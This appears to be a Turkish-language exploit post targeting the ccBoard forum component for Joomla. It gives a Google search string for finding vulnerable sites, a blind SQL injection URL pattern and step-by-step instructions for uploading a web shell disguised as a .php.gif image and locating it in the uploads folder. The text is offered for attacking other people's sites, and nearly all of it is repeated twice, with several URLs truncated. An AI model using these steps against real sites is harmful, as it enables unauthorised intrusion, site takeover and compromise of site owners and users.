Google araması : "inurlption=com_ccboard" 0r "Powered
by ccBoard"
Exploit:
blind sql injeksiyon
örnek:index.php?option=com_ccboard&view=postlist&f orum=1&topic=[ ]
http://[host]/index.php?option=com_c...ist&forum=1&am
p;topic=-2[Blind SQLi]
Nasıl Dosya veya shell upload edeceksiniz ?
1> kayıt sayfasına gidin : http://[host]/index.php?option=com_usertask=register
2> Foruma kaydolun
3> Sonra giriş yapın bir konu açın >>
4> yeni konuyu düznlemeye gelin >
örneğin: :
http://[host]/index.php?option=com_c...ost&forum=1&to
***=0&post=0&mode=post&Itemid=53
5> sonra (shell.php.gif) dosyanızı upload edin ve post edin
6> bu düzünden sehlinizi bulun ../components/com_ccboard/assets/uploads/ >
örnet bu şekilde kaydolmuştur :
http://[host]/components/com_ccboard...00ae05e1531b4e
17c78bf1093d.gif
by ccBoard"
Exploit:
blind sql injeksiyon
örnek:index.php?option=com_ccboard&view=postlist&f orum=1&topic=[ ]
http://[host]/index.php?option=com_c...ist&forum=1&am
p;topic=-2[Blind SQLi]
Nasıl Dosya veya shell upload edeceksiniz ?
1> kayıt sayfasına gidin : http://[host]/index.php?option=com_usertask=register
2> Foruma kaydolun
3> Sonra giriş yapın bir konu açın >>
4> yeni konuyu düznlemeye gelin >
örneğin: :
http://[host]/index.php?option=com_c...ost&forum=1&to
***=0&post=0&mode=post&Itemid=53
5> sonra (shell.php.gif) dosyanızı upload edin ve post edin
6> bu düzünden sehlinizi bulun ../components/com_ccboard/assets/uploads/ >
örnet bu şekilde kaydolmuştur :
http://[host]/components/com_ccboard...00ae05e1531b4e
17c78bf1093d.gif
